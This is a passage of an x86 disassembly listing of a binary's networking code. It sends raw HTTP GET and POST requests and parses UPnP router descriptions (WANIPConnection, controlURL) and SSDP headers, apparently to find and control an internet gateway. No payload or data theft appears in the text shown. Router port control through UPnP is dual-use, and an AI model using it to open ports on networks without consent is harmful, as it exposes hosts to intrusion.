mov [eax], edi
call gethostbyname
cmp eax, edi
jnz short loc_9B515E
xor eax, eax
jmp loc_9B5342
; ---------------------------------------------------------------------------
loc_9B515E: ; CODE XREF: sub_9B5139+1C�j
mov eax, [eax+0Ch]
push ebx
push 4 ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy
push 8 ; Size
lea eax, [ebp+var_1C]
push edi ; Val
push eax ; Dst
call memset
add esp, 18h
push edi ; protocol
push 1 ; type
push 2 ; af
call socket
mov ebx, eax
cmp ebx, edi
mov [ebp+s], ebx
jge short loc_9B5199
xor eax, eax
jmp loc_9B5341
; ---------------------------------------------------------------------------
loc_9B5199: ; CODE XREF: sub_9B5139+57�j
push esi
push dword ptr [ebp+netshort] ; netshort
mov [ebp+var_24], 2
call ntohs
push 10h
pop esi
mov [ebp+var_22], ax
push esi ; namelen
lea eax, [ebp+var_24]
push eax ; name
push ebx ; s
call connect
test eax, eax
jl loc_9B5337
cmp [ebp+Dest], edi
jz short loc_9B51F4
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+var_34]
push eax ; name
push ebx ; s
mov [ebp+namelen], esi
call getsockname
push [ebp+Count] ; Count
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa
push eax ; Source
push [ebp+Dest] ; Dest
call strncpy
add esp, 0Ch
loc_9B51F4: ; CODE XREF: sub_9B5139+8E�j
movzx eax, [ebp+netshort]
push eax
push [ebp+name]
mov esi, 800h
push [ebp+arg_8]
lea eax, [ebp+buf]
push offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s:%d\r\nConnectio"...
push esi ; Count
push eax ; Dest
call _snprintf
add esp, 18h
lea eax, [ebp+buf]
push edi ; flags
push eax ; Str
call strlen
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push ebx ; s
call send
push 1388h
push esi
lea eax, [ebp+buf]
push eax
mov [ebp+var_14], 1
mov [ebp+Memory], edi
push ebx
jmp loc_9B531A
; ---------------------------------------------------------------------------
loc_9B5254: ; CODE XREF: sub_9B5139+1ED�j
cmp [ebp+var_14], 0
jz loc_9B52E1
xor eax, eax
lea ecx, [ebx-3]
test ecx, ecx
mov [ebp+namelen], eax
jle loc_9B530A
loc_9B526E: ; CODE XREF: sub_9B5139+163�j
cmp [ebp+eax+buf], 0Dh
jnz short loc_9B5296
cmp [ebp+eax+var_833], 0Ah
jnz short loc_9B5296
cmp [ebp+eax+var_832], 0Dh
jnz short loc_9B5296
cmp [ebp+eax+var_831], 0Ah
jz short loc_9B52A0
loc_9B5296: ; CODE XREF: sub_9B5139+13D�j
; sub_9B5139+147�j ...
inc eax
cmp eax, ecx
mov [ebp+namelen], eax
jl short loc_9B526E
jmp short loc_9B530A
; ---------------------------------------------------------------------------
loc_9B52A0: ; CODE XREF: sub_9B5139+15B�j
and [ebp+var_14], 0
lea ecx, [ebx-4]
cmp eax, ecx
jge short loc_9B530A
sub ebx, eax
mov [ebp+var_C], ebx
add ebx, edi
lea eax, [ebx-4]
push eax ; NewSize
push [ebp+Memory] ; Memory
call realloc
mov ecx, [ebp+var_C]
add ecx, 0FFFFFFFCh
push ecx ; Size
mov ecx, [ebp+namelen]
lea ecx, [ebp+ecx+Src]
push ecx ; Src
add edi, eax
push edi ; Dst
mov [ebp+Memory], eax
call memcpy
lea edi, [ebx-4]
jmp short loc_9B5307
; ---------------------------------------------------------------------------
loc_9B52E1: ; CODE XREF: sub_9B5139+11F�j
lea eax, [ebx+edi]
push eax ; NewSize
push [ebp+Memory] ; Memory
mov [ebp+var_C], eax
call realloc
push ebx ; Size
lea ecx, [ebp+buf]
push ecx ; Src
add edi, eax
push edi ; Dst
mov [ebp+Memory], eax
call memcpy
mov edi, [ebp+var_C]
loc_9B5307: ; CODE XREF: sub_9B5139+1A6�j
add esp, 14h
loc_9B530A: ; CODE XREF: sub_9B5139+12F�j
; sub_9B5139+165�j ...
push 1388h ; int
push esi ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
loc_9B531A: ; CODE XREF: sub_9B5139+116�j
call sub_9B5CF9
mov ebx, eax
add esp, 10h
test ebx, ebx
jg loc_9B5254
mov eax, [ebp+arg_C]
mov ebx, [ebp+s]
mov [eax], edi
mov edi, [ebp+Memory]
loc_9B5337: ; CODE XREF: sub_9B5139+85�j
push ebx ; s
call closesocket
mov eax, edi
pop esi
loc_9B5341: ; CODE XREF: sub_9B5139+5B�j
pop ebx
loc_9B5342: ; CODE XREF: sub_9B5139+20�j
pop edi
leave
retn
sub_9B5139 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5345(char *Str,void *Dest,int,int)
sub_9B5345 proc near ; CODE XREF: sub_9B5440+27�p
; sub_9B5E93+120�p
Str = dword ptr 8
Dest = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+Str]
push edi
push offset asc_9A6B10 ; "://"
push esi ; Str
call strstr
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_9B5439
add ebx, 3
cmp byte ptr [esi], 68h
jnz loc_9B5439
cmp byte ptr [esi+1], 74h
jnz loc_9B5439
cmp byte ptr [esi+2], 74h
jnz loc_9B5439
cmp byte ptr [esi+3], 70h
jnz loc_9B5439
mov edi, strchr
push 3Ah ; Val
push ebx ; Str
call edi ; strchr
push 2Fh ; Val
push ebx ; Str
mov esi, eax
call edi ; strchr
mov edi, eax
add esp, 10h
test edi, edi
jz loc_9B5439
push 41h ; Size
push 0 ; Val
push [ebp+Dest] ; Dst
call memset
add esp, 0Ch
test esi, esi
jz short loc_9B540D
cmp esi, edi
ja short loc_9B540D
mov eax, esi
sub eax, ebx
cmp eax, 40h
jle short loc_9B53D2
push 40h
pop eax
loc_9B53D2: ; CODE XREF: sub_9B5345+88�j
push eax ; Count
push ebx ; Source
push [ebp+Dest] ; Dest
call strncpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
and word ptr [ecx], 0
jmp short loc_9B5404
; ---------------------------------------------------------------------------
loc_9B53E9: ; CODE XREF: sub_9B5345+C4�j
cmp al, 39h
jg short loc_9B542F
xor eax, eax
mov ax, [ecx]
imul ax, 0Ah
mov [ecx], ax
movsx dx, byte ptr [esi]
lea eax, [edx+eax-30h]
mov [ecx], ax
loc_9B5404: ; CODE XREF: sub_9B5345+A2�j
inc esi
mov al, [esi]
cmp al, 30h
jge short loc_9B53E9
jmp short loc_9B542F
; ---------------------------------------------------------------------------
loc_9B540D: ; CODE XREF: sub_9B5345+7B�j
; sub_9B5345+7F�j
mov eax, edi
sub eax, ebx
cmp eax, 40h
jle short loc_9B5419
push 40h
pop eax
loc_9B5419: ; CODE XREF: sub_9B5345+CF�j
push eax ; Count
push ebx ; Source
push [ebp+Dest] ; Dest
call strncpy
mov eax, [ebp+arg_8]
add esp, 0Ch
mov word ptr [eax], 50h
loc_9B542F: ; CODE XREF: sub_9B5345+A6�j
; sub_9B5345+C6�j
mov eax, [ebp+arg_C]
mov [eax], edi
xor eax, eax
inc eax
jmp short loc_9B543B
; ---------------------------------------------------------------------------
loc_9B5439: ; CODE XREF: sub_9B5345+1B�j
; sub_9B5345+27�j ...
xor eax, eax
loc_9B543B: ; CODE XREF: sub_9B5345+F2�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9B5345 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B5440(char *Str,int,int netshort,size_t Count)
sub_9B5440 proc near ; CODE XREF: sub_9B5DA4+32�p
Dest = byte ptr -44h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
netshort = dword ptr 10h
Count = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 44h
push esi
mov esi, [ebp+netshort]
push edi
mov edi, [ebp+arg_4]
and dword ptr [edi], 0
test esi, esi
jz short loc_9B5458
mov byte ptr [esi], 0
loc_9B5458: ; CODE XREF: sub_9B5440+13�j
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+netshort]
push eax ; int
lea eax, [ebp+Dest]
push eax ; Dest
push [ebp+Str] ; Str
call sub_9B5345
add esp, 10h
test eax, eax
jz short loc_9B548A
push [ebp+Count] ; Count
lea eax, [ebp+Dest]
push esi ; Dest
push edi ; int
push [ebp+arg_4] ; int
push [ebp+netshort] ; netshort
push eax ; name
call sub_9B5139
add esp, 18h
loc_9B548A: ; CODE XREF: sub_9B5440+31�j
pop edi
pop esi
leave
retn
sub_9B5440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B548E proc near ; CODE XREF: sub_9B55E8+97�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
jmp loc_9B55D0
; ---------------------------------------------------------------------------
loc_9B549E: ; CODE XREF: sub_9B548E+148�j
mov ecx, [esi+8]
mov al, [ecx]
cmp al, 2Fh
jz loc_9B55E1
cmp al, 3Eh
jz loc_9B55E1
mov bl, 20h
cmp al, bl
jz loc_9B55CD
cmp al, 9
jz loc_9B55CD
cmp al, 0Dh
jz loc_9B55CD
cmp al, 0Ah
jz loc_9B55CD
and [ebp+arg_0], 0
mov dl, 3Dh
cmp al, dl
mov [ebp+var_8], ecx
jz short loc_9B550A
loc_9B54E2: ; CODE XREF: sub_9B548E+7A�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, bl
jz short loc_9B550A
cmp cl, 9
jz short loc_9B550A
cmp cl, 0Dh
jz short loc_9B550A
cmp cl, 0Ah
jz short loc_9B550A
inc [ebp+arg_0]
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B5547
cmp [eax], dl
jnz short loc_9B54E2
loc_9B550A: ; CODE XREF: sub_9B548E+52�j
; sub_9B548E+5B�j ...
mov eax, [esi+8]
cmp [eax], dl
jz short loc_9B5523
mov eax, [esi+4]
loc_9B5514: ; CODE XREF: sub_9B548E+93�j
inc dword ptr [esi+8]
cmp [esi+8], eax
jnb short loc_9B5547
mov ecx, [esi+8]
cmp [ecx], dl
jnz short loc_9B5514
loc_9B5523: ; CODE XREF: sub_9B548E+81�j
inc dword ptr [esi+8]
mov eax, [esi+8]
loc_9B5529: ; CODE XREF: sub_9B548E+B7�j
mov cl, [eax]
cmp cl, bl
jz short loc_9B553E
cmp cl, 9
jz short loc_9B553E
cmp cl, 0Dh
jz short loc_9B553E
cmp cl, 0Ah
jnz short loc_9B554F
loc_9B553E: ; CODE XREF: sub_9B548E+9F�j
; sub_9B548E+A4�j ...
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jb short loc_9B5529
loc_9B5547: ; CODE XREF: sub_9B548E+76�j
; sub_9B548E+8C�j ...
or eax, 0FFFFFFFFh
loc_9B554A: ; CODE XREF: sub_9B548E+155�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B554F: ; CODE XREF: sub_9B548E+AE�j
mov cl, [eax]
cmp cl, 27h
jz short loc_9B5591
cmp cl, 22h
jz short loc_9B5591
xor edi, edi
cmp cl, bl
mov [ebp+var_4], eax
jz short loc_9B55B4
loc_9B5564: ; CODE XREF: sub_9B548E+FF�j
mov cl, [eax]
cmp cl, 9
jz short loc_9B55B4
cmp cl, 0Dh
jz short loc_9B55B4
cmp cl, 0Ah
jz short loc_9B55B4
cmp cl, 3Eh
jz short loc_9B55B4
cmp cl, 2Fh
jz short loc_9B55B4
inc edi
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb short loc_9B5547
mov ecx, eax
cmp [ecx], bl
jnz short loc_9B5564
jmp short loc_9B55B4
; ---------------------------------------------------------------------------
loc_9B5591: ; CODE XREF: sub_9B548E+C6�j
; sub_9B548E+CB�j
mov edx, [esi+4]
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B5547
xor edi, edi
cmp [eax], cl
mov [ebp+var_4], eax
jz short loc_9B55B4
loc_9B55A5: ; CODE XREF: sub_9B548E+124�j
inc edi
inc eax
cmp eax, edx
mov [esi+8], eax
jnb short loc_9B5547
mov ebx, eax
cmp [ebx], cl
jnz short loc_9B55A5
loc_9B55B4: ; CODE XREF: sub_9B548E+D4�j
; sub_9B548E+DB�j ...
mov eax, [esi+20h]
test eax, eax
jz short loc_9B55CD
push edi
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
push dword ptr [esi+10h]
call eax
add esp, 14h
loc_9B55CD: ; CODE XREF: sub_9B548E+29�j
; sub_9B548E+31�j ...
inc dword ptr [esi+8]
loc_9B55D0: ; CODE XREF: sub_9B548E+B�j
mov eax, [esi+8]
cmp eax, [esi+4]
jb loc_9B549E
jmp loc_9B5547
; ---------------------------------------------------------------------------
loc_9B55E1: ; CODE XREF: sub_9B548E+17�j
; sub_9B548E+1F�j
xor eax, eax
jmp loc_9B554A
sub_9B548E endp
; =============== S U B R O U T I N E =======================================
sub_9B55E8 proc near ; CODE XREF: sub_9B5746+12�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jnb loc_9B5744
push ebx
push edi
loc_9B55FC: ; CODE XREF: sub_9B55E8+154�j
mov ecx, [esi+8]
cmp byte ptr [ecx], 3Ch
jnz loc_9B5731
lea eax, [ecx+1]
cmp byte ptr [eax], 3Fh
jz loc_9B5731
xor edx, edx
mov [esi+8], eax
cmp byte ptr [eax], 20h
mov edi, eax
jz loc_9B56EF
loc_9B5624: ; CODE XREF: sub_9B55E8+7B�j
mov eax, [esi+8]
mov cl, [eax]
cmp cl, 9
jz short loc_9B5665
cmp cl, 0Dh
jz short loc_9B5665
cmp cl, 0Ah
jz short loc_9B5665
cmp cl, 3Eh
jz short loc_9B5665
cmp cl, 2Fh
jz short loc_9B5665
inc edx
inc eax
cmp eax, [esi+4]
mov [esi+8], eax
jnb loc_9B5742
cmp byte ptr [eax], 3Ah
jnz short loc_9B565D
xor edx, edx
inc eax
mov [esi+8], eax
mov edi, eax
loc_9B565D: ; CODE XREF: sub_9B55E8+6B�j
mov eax, [esi+8]
cmp byte ptr [eax], 20h
jnz short loc_9B5624
loc_9B5665: ; CODE XREF: sub_9B55E8+44�j
; sub_9B55E8+49�j ...
test edx, edx
jle loc_9B56EF
mov eax, [esi+14h]
test eax, eax
jz short loc_9B567E
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B567E: ; CODE XREF: sub_9B55E8+8A�j
push esi
call sub_9B548E
test eax, eax
pop ecx
jnz loc_9B5742
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jz loc_9B5735
mov ecx, [esi+4]
xor edi, edi
inc eax
mov ebx, eax
jmp short loc_9B56BA
; ---------------------------------------------------------------------------
loc_9B56A3: ; CODE XREF: sub_9B55E8+D7�j
mov dl, [eax]
cmp dl, 20h
jz short loc_9B56B9
cmp dl, 9
jz short loc_9B56B9
cmp dl, 0Dh
jz short loc_9B56B9
cmp dl, 0Ah
jnz short loc_9B56C3
loc_9B56B9: ; CODE XREF: sub_9B55E8+C0�j
; sub_9B55E8+C5�j ...
inc eax
loc_9B56BA: ; CODE XREF: sub_9B55E8+B9�j
cmp eax, ecx
mov [esi+8], eax
jb short loc_9B56A3
jmp short loc_9B5742
; ---------------------------------------------------------------------------
loc_9B56C3: ; CODE XREF: sub_9B55E8+CF�j
cmp byte ptr [eax], 3Ch
jz short loc_9B5735
loc_9B56C8: ; CODE XREF: sub_9B55E8+EE�j
inc edi
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B5742
mov edx, eax
cmp byte ptr [edx], 3Ch
jnz short loc_9B56C8
test edi, edi
jle short loc_9B5735
mov eax, [esi+1Ch]
test eax, eax
jz short loc_9B5735
push edi
push ebx
push dword ptr [esi+10h]
call eax
add esp, 0Ch
jmp short loc_9B5735
; ---------------------------------------------------------------------------
loc_9B56EF: ; CODE XREF: sub_9B55E8+36�j
; sub_9B55E8+7F�j
mov eax, [esi+8]
cmp byte ptr [eax], 2Fh
jnz short loc_9B5735
mov ecx, [esi+4]
xor edx, edx
inc eax
cmp eax, ecx
mov [esi+8], eax
mov edi, eax
jnb short loc_9B5742
cmp byte ptr [eax], 3Eh
jz short loc_9B571B
loc_9B570B: ; CODE XREF: sub_9B55E8+131�j
inc edx
inc eax
cmp eax, ecx
mov [esi+8], eax
jnb short loc_9B5742
mov ebx, eax
cmp byte ptr [ebx], 3Eh
jnz short loc_9B570B
loc_9B571B: ; CODE XREF: sub_9B55E8+121�j
mov eax, [esi+18h]
test eax, eax
jz short loc_9B572C
push edx
push edi
push dword ptr [esi+10h]
call eax
add esp, 0Ch
loc_9B572C: ; CODE XREF: sub_9B55E8+138�j
inc dword ptr [esi+8]
jmp short loc_9B5735
; ---------------------------------------------------------------------------
loc_9B5731: ; CODE XREF: sub_9B55E8+1A�j
; sub_9B55E8+26�j
inc ecx
mov [esi+8], ecx
loc_9B5735: ; CODE XREF: sub_9B55E8+AB�j
; sub_9B55E8+DE�j ...
mov eax, [esi+4]
dec eax
cmp [esi+8], eax
jb loc_9B55FC
loc_9B5742: ; CODE XREF: sub_9B55E8+62�j
; sub_9B55E8+9F�j ...
pop edi
pop ebx
loc_9B5744: ; CODE XREF: sub_9B55E8+C�j
pop esi
retn
sub_9B55E8 endp
; =============== S U B R O U T I N E =======================================
sub_9B5746 proc near ; CODE XREF: sub_9B5A22+35�p
; sub_9B63B6+34�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax]
mov edx, [eax+0Ch]
add edx, ecx
push eax
mov [eax+8], ecx
mov [eax+4], edx
call sub_9B55E8
pop ecx
retn
sub_9B5746 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B575F(void *Dst,void *Buf1,size_t Size)
sub_9B575F proc near ; DATA XREF: sub_9B5A22+20�o
Dst = dword ptr 4
Buf1 = dword ptr 8
Size = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+Dst]
push edi
mov edi, [esp+0Ch+Size]
push edi ; Size
push [esp+10h+Buf1] ; Src
push esi ; Dst
call memcpy
xor bl, bl
add esp, 0Ch
mov [esi+edi], bl
inc dword ptr [esi+100h]
cmp edi, 7
jnz short loc_9B57B6
push edi ; Size
push offset aService ; "service"
push [esp+14h+Buf1] ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9B57B6
mov [esi+504h], bl
mov [esi+584h], bl
mov [esi+604h], bl
mov [esi+684h], bl
loc_9B57B6: ; CODE XREF: sub_9B575F+27�j
; sub_9B575F+3D�j
pop edi
pop esi
pop ebx
retn
sub_9B575F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B57BA(int,void *Buf1,int)
sub_9B57BA proc near ; DATA XREF: sub_9B5A22+27�o
arg_0 = dword ptr 4
Buf1 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
dec dword ptr [esi+100h]
cmp [esp+4+arg_8], 7
jnz loc_9B58C3
push 7 ; Size
push offset aService ; "service"
push [esp+0Ch+Buf1] ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz loc_9B58C3
push ebx
push edi
lea ebx, [esi+684h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B584D
mov edi, 80h
push edi ; Size
lea eax, [esi+504h]
push eax ; Src
lea eax, [esi+104h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+584h]
push eax ; Src
lea eax, [esi+184h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+604h]
push eax ; Src
lea eax, [esi+204h]
push eax ; Dst
call memcpy
add esi, 284h
jmp short loc_9B58B6
; ---------------------------------------------------------------------------
loc_9B584D: ; CODE XREF: sub_9B57BA+48�j
push offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_9B586F
push offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
push ebx ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B58C1
loc_9B586F: ; CODE XREF: sub_9B57BA+A2�j
mov edi, 80h
push edi ; Size
lea eax, [esi+504h]
push eax ; Src
lea eax, [esi+304h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+584h]
push eax ; Src
lea eax, [esi+384h]
push eax ; Dst
call memcpy
push edi ; Size
lea eax, [esi+604h]
push eax ; Src
lea eax, [esi+404h]
push eax ; Dst
call memcpy
add esi, 484h
loc_9B58B6: ; CODE XREF: sub_9B57BA+91�j
push edi ; Size
push ebx ; Src
push esi ; Dst
call memcpy
add esp, 30h
loc_9B58C1: ; CODE XREF: sub_9B57BA+B3�j
pop edi
pop ebx
loc_9B58C3: ; CODE XREF: sub_9B57BA+10�j
; sub_9B57BA+2B�j
pop esi
retn
sub_9B57BA endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B58C5(char *Str1,void *Src,size_t Size)
sub_9B58C5 proc near ; DATA XREF: sub_9B5A22+2E�o
Str1 = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push esi
mov esi, [esp+4+Str1]
push offset aUrlbase ; "URLBase"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B58E3
add esi, 80h
jmp short loc_9B5945
; ---------------------------------------------------------------------------
loc_9B58E3: ; CODE XREF: sub_9B58C5+14�j
push offset aServicetype ; "serviceType"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B58FC
add esi, 684h
jmp short loc_9B5945
; ---------------------------------------------------------------------------
loc_9B58FC: ; CODE XREF: sub_9B58C5+2D�j
push offset aControlurl ; "controlURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B5915
add esi, 504h
jmp short loc_9B5945
; ---------------------------------------------------------------------------
loc_9B5915: ; CODE XREF: sub_9B58C5+46�j
push offset aEventsuburl ; "eventSubURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B592E
add esi, 584h
jmp short loc_9B5945
; ---------------------------------------------------------------------------
loc_9B592E: ; CODE XREF: sub_9B58C5+5F�j
push offset aScpdurl ; "SCPDURL"
push esi ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B596C
add esi, 604h
loc_9B5945: ; CODE XREF: sub_9B58C5+1C�j
; sub_9B58C5+35�j ...
test esi, esi
jz short loc_9B596C
push edi
mov edi, [esp+8+Size]
cmp edi, 80h
jl short loc_9B5959
push 7Fh
pop edi
loc_9B5959: ; CODE XREF: sub_9B58C5+8F�j
push edi ; Size
push [esp+0Ch+Src] ; Src
push esi ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+edi], 0
pop edi
loc_9B596C: ; CODE XREF: sub_9B58C5+78�j
; sub_9B58C5+82�j
pop esi
retn
sub_9B58C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B596E(SOCKET s,int,int,int len,int,char *Str)
sub_9B596E proc near ; CODE XREF: sub_9B5E93+1A9�p
Src = byte ptr -208h
Dest = byte ptr -8
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
len = dword ptr 14h
arg_10 = dword ptr 18h
Str = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push [ebp+Str] ; Str
call strlen
cmp word ptr [ebp+len], 50h
mov esi, _snprintf
pop ecx
mov ebx, eax
mov [ebp+Dest], 0
jz short loc_9B59AB
movzx eax, word ptr [ebp+len]
push eax
push offset aHu ; ":%hu"
lea eax, [ebp+Dest]
push 8 ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 10h
loc_9B59AB: ; CODE XREF: sub_9B596E+26�j
push [ebp+arg_10]
lea eax, [ebp+Dest]
push ebx
push eax
push [ebp+arg_8]
lea eax, [ebp+Src]
push [ebp+arg_4]
push offset aPostSHttp1_1Ho ; "POST %s HTTP/1.1\r\nHost: %s%s\r\nUser-Agen"...
push 200h ; Count
push eax ; Dest
call esi ; _snprintf
mov edi, eax
lea eax, [edi+ebx]
push eax ; Size
mov [ebp+len], eax
call malloc
mov esi, eax
add esp, 24h
test esi, esi
jz short loc_9B5A1D
push edi ; Size
lea eax, [ebp+Src]
push eax ; Src
push esi ; Dst
call memcpy
push ebx ; Size
push [ebp+Str] ; Src
lea eax, [esi+edi]
push eax ; Dst
call memcpy
add esp, 18h
push 0 ; flags
push [ebp+len] ; len
push esi ; buf
push [ebp+s] ; s
call send
push esi ; Memory
mov edi, eax
call free
pop ecx
mov eax, edi
loc_9B5A1D: ; CODE XREF: sub_9B596E+74�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B596E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B5A22 proc near ; CODE XREF: sub_9B5DA4+65�p
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_8]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
mov [ebp+var_10], offset sub_9B575F
mov [ebp+var_C], offset sub_9B57BA
mov [ebp+var_8], offset sub_9B58C5
call sub_9B5746
pop ecx
leave
retn
sub_9B5A22 endp
; =============== S U B R O U T I N E =======================================
sub_9B5A5F proc near ; CODE XREF: sub_9B5E93+219�p
push ebx
push esi
push edi
mov edi, eax
mov esi, offset aContentLength ; "content-length"
xor eax, eax
loc_9B5A6B: ; CODE XREF: sub_9B5A5F+2B�j
test edi, edi
jz short loc_9B5A95
mov dl, [esi]
mov bl, [ecx]
cmp dl, bl
jz short loc_9B5A84
movsx ebx, bl
movsx edx, dl
add ebx, 20h
cmp edx, ebx
jnz short loc_9B5A95
loc_9B5A84: ; CODE XREF: sub_9B5A5F+16�j
inc ecx
inc esi
dec edi
cmp byte ptr [esi], 0
jnz short loc_9B5A6B
test edi, edi
jz short loc_9B5A95
cmp byte ptr [ecx], 3Ah
jz short loc_9B5AA0
loc_9B5A95: ; CODE XREF: sub_9B5A5F+E�j
; sub_9B5A5F+23�j ...
or eax, 0FFFFFFFFh
loc_9B5A98: ; CODE XREF: sub_9B5A5F+4D�j
; sub_9B5A5F+66�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B5A9C: ; CODE XREF: sub_9B5A5F+46�j
test edi, edi
jz short loc_9B5A95
loc_9B5AA0: ; CODE XREF: sub_9B5A5F+34�j
inc ecx
dec edi
cmp byte ptr [ecx], 20h
jz short loc_9B5A9C
jmp short loc_9B5ABE
; ---------------------------------------------------------------------------
loc_9B5AA9: ; CODE XREF: sub_9B5A5F+64�j
cmp dl, 39h
jg short loc_9B5A98
test edi, edi
jz short loc_9B5A95
movsx edx, dl
lea eax, [eax+eax*4]
inc ecx
lea eax, [edx+eax*2-30h]
dec edi
loc_9B5ABE: ; CODE XREF: sub_9B5A5F+48�j
mov dl, [ecx]
cmp dl, 30h
jge short loc_9B5AA9
jmp short loc_9B5A98
sub_9B5A5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B5AC7 proc near ; CODE XREF: sub_9B611D+19C�p
var_8 = dword ptr -8
Buf1 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor edi, edi
xor esi, esi
xor edx, edx
cmp [ebp+arg_0], edi
jle loc_9B5B69
loc_9B5ADD: ; CODE XREF: sub_9B5AC7+9C�j
lea eax, [esi+1]
mov cl, [ebx+eax-1]
cmp cl, 0Ah
mov [ebp+var_8], eax
jz short loc_9B5AFE
cmp cl, 0Dh
jz short loc_9B5AFE
cmp cl, 3Ah
jnz short loc_9B5B5E
test edi, edi
jnz short loc_9B5B5E
mov edi, esi
jmp short loc_9B5B5E
; ---------------------------------------------------------------------------
loc_9B5AFE: ; CODE XREF: sub_9B5AC7+23�j
; sub_9B5AC7+28�j
test edi, edi
jz short loc_9B5B5C
loc_9B5B02: ; CODE XREF: sub_9B5AC7+40�j
inc edi
cmp byte ptr [edi+ebx], 20h
jz short loc_9B5B02
push 8 ; Size
lea eax, [edx+ebx]
push offset aLocation ; "location"
push eax ; Buf1
mov [ebp+Buf1], eax
call _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B5B31
mov ecx, [ebp+arg_4]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_8]
jmp short loc_9B5B53
; ---------------------------------------------------------------------------
loc_9B5B31: ; CODE XREF: sub_9B5AC7+5B�j
push 2 ; Size
push offset aSt ; "st"
push [ebp+Buf1] ; Buf1
call _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B5B57
mov ecx, [ebp+arg_C]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_10]
loc_9B5B53: ; CODE XREF: sub_9B5AC7+68�j
sub esi, edi
mov [eax], esi
